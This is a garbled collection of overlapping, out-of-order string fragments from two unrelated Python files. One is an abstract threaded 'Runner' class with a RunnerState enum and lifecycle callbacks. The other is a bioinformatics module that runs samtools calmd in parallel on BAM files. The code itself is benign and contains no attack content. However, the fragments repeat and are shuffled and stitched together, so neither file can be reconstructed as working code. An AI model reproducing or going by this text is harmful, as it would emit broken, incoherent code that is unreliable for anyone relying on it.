"= auto() # The runner has stopped - in response to a stop()",
"a stop() FAILED = auto() # There has been a problem END =",
"RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set",
"by the following sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE",
"def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with instances of",
"@unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is always",
"called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid)",
"it's # the responsibility of the implementing class. self._stopping = True print('End is",
"in response to a stop() STOPPED = auto() # The runner has stopped",
"% self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}'",
"must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the",
"\"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None",
"STOPPED = auto() # The runner has stopped - in response to a",
"def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the user. :param",
"naturally. If the Runner is still running this method introduces the ``RunnerState`` values",
"stopping - in response to a stop() STOPPED = auto() # The runner",
"runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}'",
"= callback self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid =",
"assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid))",
"This method should be called only of a Runner is to be prematurely",
"# Inform the user of each state change. # The receiver must expect",
"running this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not",
"the state). # This should cause the main thread to exit - it's",
"The Runner is Running COMPLETE = auto() # The Runner has completed its",
"the user. :param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert",
"unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class",
"Runner is preparing to run RUNNING = auto() # The Runner is Running",
"only of a Runner is to be prematurely stopped. Runners have a built-in",
"The Runner initial state (assigned in begin()) PREPARING = auto() # The Runner",
"actions (naturally) STOPPING = auto() # The Runner is stopping - in response",
"deleted is represented by the following sequence: # # BEGIN - PREPARING -",
"``Runner`` base class, from which all Runners are derived. \"\"\" def __init__(self, callback,",
"final event is always END. # # The normal event sequence, which relates",
"# The normal event sequence, which relates to a runner # that's successfully",
"prematurely stopped. Runners have a built-in lifetime and are normally left to complete",
"last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg'])",
"to a stop() STOPPED = auto() # The runner has stopped - in",
"msg=None): \"\"\"Sets the runner state and informs the user. :param runner_state: The new",
"always BEGIN. # The last and final event is always END. # #",
"= namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from",
"RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first",
"does nothing if the Runner is already stopping or has completed. This method",
"python3 \"\"\"An abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections",
"Runner is to be prematurely stopped. Runners have a built-in lifetime and are",
"auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique",
"the Runner is already stopping or has completed. This method must not block.",
"user of each state change. # The receiver must expect a `RunnerStateTuple` as",
"def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback",
"and is then # automatically deleted is represented by the following sequence: #",
"sequence, which relates to a runner # that's successfully created, runs, completes and",
"'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is",
"built-in lifetime and are normally left to complete naturally. If the Runner is",
"the Runner. The state_callback will be supplied with instances of the RunnerState as",
"block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress).",
"run RUNNING = auto() # The Runner is Running COMPLETE = auto() #",
"issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread,",
"or has completed. This method must not block. \"\"\" print('End called... {%s}' %",
"(naturally) STOPPING = auto() # The Runner is stopping - in response to",
"import ABCMeta, abstractmethod from collections import namedtuple from enum import Enum, auto, unique",
"isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) #",
"print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' %",
"% (runner_state, self._runner_uuid)) # Inform the user of each state change. # The",
"from abc import ABCMeta, abstractmethod from collections import namedtuple from enum import Enum,",
"Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state",
"self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will",
"# that's successfully created, runs, completes and is then # automatically deleted is",
"The last and final event is always END. # # The normal event",
"runs, completes and is then # automatically deleted is represented by the following",
"FAILED = auto() # There has been a problem END = auto() #",
"self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the",
"stopping or has completed. This method must not block. \"\"\" print('End called... {%s}'",
"# This should cause the main thread to exit - it's # the",
"COMPLETE = auto() # The Runner has completed its actions (naturally) STOPPING =",
"with instances of the RunnerState as the runner progresses. This method must only",
"is already stopping or has completed. This method must not block. \"\"\" print('End",
"# There has been a problem END = auto() # The last event,",
"% self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the",
"This method does nothing if the Runner is already stopping or has completed.",
"= 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" #",
"RunnerState as the runner progresses. This method must only be called once. This",
"stop() FAILED = auto() # There has been a problem END = auto()",
"to a stop() FAILED = auto() # There has been a problem END",
"RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\"",
"has completed its actions (naturally) STOPPING = auto() # The Runner is stopping",
"completed its actions (naturally) STOPPING = auto() # The Runner is stopping -",
"(and change the state). # This should cause the main thread to exit",
"\"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context =",
"import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution",
"auto() # The Runner has completed its actions (naturally) STOPPING = auto() #",
"# Just set the 'stopping' field (and change the state). # This should",
"to exit - it's # the responsibility of the implementing class. self._stopping =",
"change the state). # This should cause the main thread to exit -",
"stopped. Runners have a built-in lifetime and are normally left to complete naturally.",
"\"\"\"An abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections import",
"namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which",
"from which all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic",
"when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta):",
"method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops",
"``STOPPED``, normally not seen. This method does nothing if the Runner is already",
"states. \"\"\" # The first event is always BEGIN. # The last and",
"will be supplied with instances of the RunnerState as the runner progresses. This",
"If the Runner is still running this method introduces the ``RunnerState`` values of",
"in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner",
"self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the state). # This",
"- COMPLETE - END BEGIN = auto() # The Runner initial state (assigned",
"runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state",
"{%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone).",
"# The Runner is preparing to run RUNNING = auto() # The Runner",
"# The Runner is Running COMPLETE = auto() # The Runner has completed",
"# The Runner initial state (assigned in begin()) PREPARING = auto() # The",
":param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState)",
"a runner # that's successfully created, runs, completes and is then # automatically",
"completed. This method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if",
"# The Runner has completed its actions (naturally) STOPPING = auto() # The",
"import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum):",
"``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing",
"event is always BEGIN. # The last and final event is always END.",
"are normally left to complete naturally. If the Runner is still running this",
"relates to a runner # that's successfully created, runs, completes and is then",
"return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the state). #",
"auto() # The Runner initial state (assigned in begin()) PREPARING = auto() #",
"\"\"\"Starts the Runner. The state_callback will be supplied with instances of the RunnerState",
"END. # # The normal event sequence, which relates to a runner #",
"responsibility of the implementing class. self._stopping = True print('End is nigh! {%s}' %",
"to complete naturally. If the Runner is still running this method introduces the",
"the first argument # in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state,",
"PREPARING - RUNNING - COMPLETE - END BEGIN = auto() # The Runner",
"is still running this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``,",
"= threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the",
"auto() # The runner has stopped - in response to a stop() FAILED",
"self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE,",
"must only be called once. This method must not block. \"\"\" assert self._runner_state",
"state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState",
"state and informs the user. :param runner_state: The new Runner state :type runner_state:",
"The Runner is stopping - in response to a stop() STOPPED = auto()",
"begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with instances of the",
"only be called once. This method must not block. \"\"\" assert self._runner_state is",
"RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform",
"should be called only of a Runner is to be prematurely stopped. Runners",
"response to a stop() STOPPED = auto() # The runner has stopped -",
"complete naturally. If the Runner is still running this method introduces the ``RunnerState``",
"argument # in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg)",
"have a built-in lifetime and are normally left to complete naturally. If the",
"COMPLETE - END BEGIN = auto() # The Runner initial state (assigned in",
"\"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state,",
"all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser.",
"`RunnerStateTuple` as the first argument # in the callback method. assert self._state_callback rso",
"module. \"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple from enum",
"and are normally left to complete naturally. If the Runner is still running",
"\"\"\"Sets the runner state and informs the user. :param runner_state: The new Runner",
"# The last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state',",
"self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}'",
"informs the user. :param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\"",
"be called once. This method must not block. \"\"\" assert self._runner_state is None",
"receiver must expect a `RunnerStateTuple` as the first argument # in the callback",
"the 'stopping' field (and change the state). # This should cause the main",
"basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context",
"left to complete naturally. If the Runner is still running this method introduces",
"# automatically deleted is represented by the following sequence: # # BEGIN -",
"Runner initial state (assigned in begin()) PREPARING = auto() # The Runner is",
":type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s)",
"in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) #",
"= 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event",
"- END BEGIN = auto() # The Runner initial state (assigned in begin())",
"# The runner has stopped - in response to a stop() FAILED =",
"should cause the main thread to exit - it's # the responsibility of",
"self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the user.",
"the following sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE -",
"print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]:",
"and final event is always END. # # The normal event sequence, which",
"Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and",
"self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock()",
"which relates to a runner # that's successfully created, runs, completes and is",
"state). # This should cause the main thread to exit - it's #",
"method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self):",
"\"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple from enum import",
"import namedtuple from enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE",
"this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen.",
"\"\"\"Stops the Runner. This method should be called only of a Runner is",
"derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert",
"'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are",
"completes and is then # automatically deleted is represented by the following sequence:",
"END BEGIN = auto() # The Runner initial state (assigned in begin()) PREPARING",
"Runner has completed its actions (naturally) STOPPING = auto() # The Runner is",
"Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest'",
"is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be called",
"self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be called only of",
"The Runner has completed its actions (naturally) STOPPING = auto() # The Runner",
"of the RunnerState as the runner progresses. This method must only be called",
"must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already",
"normally not seen. This method does nothing if the Runner is already stopping",
"self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be",
"the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The",
"not seen. This method does nothing if the Runner is already stopping or",
"# in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso,",
"@abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with instances",
"Runner is stopping - in response to a stop() STOPPED = auto() #",
"RUNNING = auto() # The Runner is Running COMPLETE = auto() # The",
"['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all",
"and informs the user. :param runner_state: The new Runner state :type runner_state: ``RunnerState",
"represented by the following sequence: # # BEGIN - PREPARING - RUNNING -",
"__init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback =",
"Runner is Running COMPLETE = auto() # The Runner has completed its actions",
"method must only be called once. This method must not block. \"\"\" assert",
"automatically deleted is represented by the following sequence: # # BEGIN - PREPARING",
"following sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE - END",
"event sequence, which relates to a runner # that's successfully created, runs, completes",
"in begin()) PREPARING = auto() # The Runner is preparing to run RUNNING",
"RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is always BEGIN. #",
"execution states. \"\"\" # The first event is always BEGIN. # The last",
"self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the",
"self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock",
"callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context",
"abstractmethod from collections import namedtuple from enum import Enum, auto, unique import threading",
"each state change. # The receiver must expect a `RunnerStateTuple` as the first",
"= auto() # The Runner is preparing to run RUNNING = auto() #",
"nothing if the Runner is already stopping or has completed. This method must",
"progresses. This method must only be called once. This method must not block.",
"change. # The receiver must expect a `RunnerStateTuple` as the first argument #",
"is stopping - in response to a stop() STOPPED = auto() # The",
"set the 'stopping' field (and change the state). # This should cause the",
"are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self)",
"auto() # The Runner is stopping - in response to a stop() STOPPED",
"the Runner is still running this method introduces the ``RunnerState`` values of ``STOPPING``",
"not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in",
"auto() # The Runner is Running COMPLETE = auto() # The Runner has",
"a `RunnerStateTuple` as the first argument # in the callback method. assert self._state_callback",
"field (and change the state). # This should cause the main thread to",
"callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping = False",
"always END. # # The normal event sequence, which relates to a runner",
"supplied with instances of the RunnerState as the runner progresses. This method must",
"the Runner. This method should be called only of a Runner is to",
"first event is always BEGIN. # The last and final event is always",
"BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN = auto() #",
"The last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context',",
"initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state =",
"runner state and informs the user. :param runner_state: The new Runner state :type",
"as the runner progresses. This method must only be called once. This method",
"in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context)",
"already stopping or has completed. This method must not block. \"\"\" print('End called...",
"to run RUNNING = auto() # The Runner is Running COMPLETE = auto()",
"is then # automatically deleted is represented by the following sequence: # #",
"the responsibility of the implementing class. self._stopping = True print('End is nigh! {%s}'",
"event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class",
"Inform the user of each state change. # The receiver must expect a",
"values of ``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing if",
"gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base",
"msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be",
"Runner. This method should be called only of a Runner is to be",
"self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' %",
"\"\"\" # The first event is always BEGIN. # The last and final",
"collections import namedtuple from enum import Enum, auto, unique import threading import uuid",
"problem END = auto() # The last event, issued when the runner's gone",
"instances of the RunnerState as the runner progresses. This method must only be",
"class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are derived.",
"# A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def",
"= auto() # There has been a problem END = auto() # The",
"The state_callback will be supplied with instances of the RunnerState as the runner",
"be called only of a Runner is to be prematurely stopped. Runners have",
"method does nothing if the Runner is already stopping or has completed. This",
"# # BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN =",
"The runner has stopped - in response to a stop() FAILED = auto()",
"print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the",
"normal event sequence, which relates to a runner # that's successfully created, runs,",
"- PREPARING - RUNNING - COMPLETE - END BEGIN = auto() # The",
"Runners have a built-in lifetime and are normally left to complete naturally. If",
"= None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock",
"method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This",
"self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() #",
"auto() # The Runner is preparing to run RUNNING = auto() # The",
"is preparing to run RUNNING = auto() # The Runner is Running COMPLETE",
"runner progresses. This method must only be called once. This method must not",
"the runner progresses. This method must only be called once. This method must",
"runner has stopped - in response to a stop() FAILED = auto() #",
"rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner.",
"is represented by the following sequence: # # BEGIN - PREPARING - RUNNING",
"ABCMeta, abstractmethod from collections import namedtuple from enum import Enum, auto, unique import",
"lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None):",
"RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class,",
"seen. This method does nothing if the Runner is already stopping or has",
"STOPPING = auto() # The Runner is stopping - in response to a",
"been a problem END = auto() # The last event, issued when the",
"method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring",
"of the implementing class. self._stopping = True print('End is nigh! {%s}' % self._runner_uuid)",
"end(self): \"\"\"Stops the Runner. This method should be called only of a Runner",
"has stopped - in response to a stop() FAILED = auto() # There",
"_set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the user. :param runner_state:",
"once. This method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def",
"threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner",
"Runner is already stopping or has completed. This method must not block. \"\"\"",
"# The Runner is stopping - in response to a stop() STOPPED =",
"= RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The",
"= uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' %",
"The normal event sequence, which relates to a runner # that's successfully created,",
"thread to exit - it's # the responsibility of the implementing class. self._stopping",
"Runner. The state_callback will be supplied with instances of the RunnerState as the",
"\"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method",
"exit - it's # the responsibility of the implementing class. self._stopping = True",
"the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod",
"# the responsibility of the implementing class. self._stopping = True print('End is nigh!",
"_Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple from",
"Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New",
"\"\"\"Runner execution states. \"\"\" # The first event is always BEGIN. # The",
"sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN",
"Just set the 'stopping' field (and change the state). # This should cause",
"self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the state).",
"Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\"",
"new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state",
"Running COMPLETE = auto() # The Runner has completed its actions (naturally) STOPPING",
"False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner()",
"import Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG =",
"begin()) PREPARING = auto() # The Runner is preparing to run RUNNING =",
"self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with",
"the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This method does",
"which all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner"
] |
[
"= alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs = [] for",
"not be a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands =",
"the ## files. Don't add again. #i = 0 #while i < len(jobs):",
"out_filename = x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam> # May",
"import filelib from genomicode import parallel from genomicode import alignlib from Betsy import",
"read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different file. x",
"list of samtools commands. # Takes ~200 Mb per process, so should not",
"hard! #import sys #sys_path_old = sys.path[:] #sys.path = [x for x in sys.path",
"= os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert",
"% (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed",
"import parallel from genomicode import alignlib from Betsy import module_utils ## Importing pysam",
"samtools calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1]",
"# Takes ~200 Mb per process, so should not be a big issue.",
"out_filename jobs.append(x) # Don't do this. Need MD, NM, NH in # summarize_alignment_cigar.",
"run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode import",
"of (in_filename, err_filename, out_filename) jobs = [] for in_filename in bam_filenames: p, f",
"# handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict = dict(align.tags)",
"tags. Just symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make",
"continue # # Has MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename)",
"= jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() #",
"jobs: in_filename, log_filename, out_filename = x # samtools calmd -b <in.bam> <ref.fasta> >",
"assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename,",
"sure, just redo it. ## If the files already have MD tags, then",
"files already have MD tags, then just symlink the ## files. Don't add",
"for in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename",
"out_filename) jobs = [] for in_filename in bam_filenames: p, f = os.path.split(in_filename) s,",
"dict(align.tags) # if \"MD\" not in tag_dict: # i += 1 # continue",
"< 0] #import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames =",
"# if \"MD\" not in tag_dict: # i += 1 # continue #",
"err_filename, out_filename) jobs = [] for in_filename in bam_filenames: p, f = os.path.split(in_filename)",
"# list of (in_filename, err_filename, out_filename) jobs = [] for in_filename in bam_filenames:",
"parallel.quote commands = [] for x in jobs: in_filename, log_filename, out_filename = x",
"## files. Don't add again. #i = 0 #while i < len(jobs): #",
"successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self, antecedents, user_options):",
"filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x in jobs: in_filename, log_filename,",
"len(jobs): # in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") #",
"del jobs[i] # Make a list of samtools commands. # Takes ~200 Mb",
"= x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate",
"#import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert",
"filelib from genomicode import parallel from genomicode import alignlib from Betsy import module_utils",
"s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path,",
"= os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename",
"# Make sure the analysis completed successfully. x = [x[-1] for x in",
"out_path): import os from genomicode import config from genomicode import filelib from genomicode",
"# in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align",
"module_utils ## Importing pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path =",
"be a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = []",
"x = \" \".join(x) x = \"%s 2> %s 1> %s\" % (x,",
"the analysis completed successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def",
"\" \".join(x) x = \"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename))",
"ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref =",
"f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s)",
"Don't do this. Need MD, NM, NH in # summarize_alignment_cigar. To be sure,",
"just symlink the ## files. Don't add again. #i = 0 #while i",
"jobs.append(x) # Don't do this. Need MD, NM, NH in # summarize_alignment_cigar. To",
"is hard! #import sys #sys_path_old = sys.path[:] #sys.path = [x for x in",
"= antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier)",
"antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path)",
"genomicode import filelib from genomicode import parallel from genomicode import alignlib from Betsy",
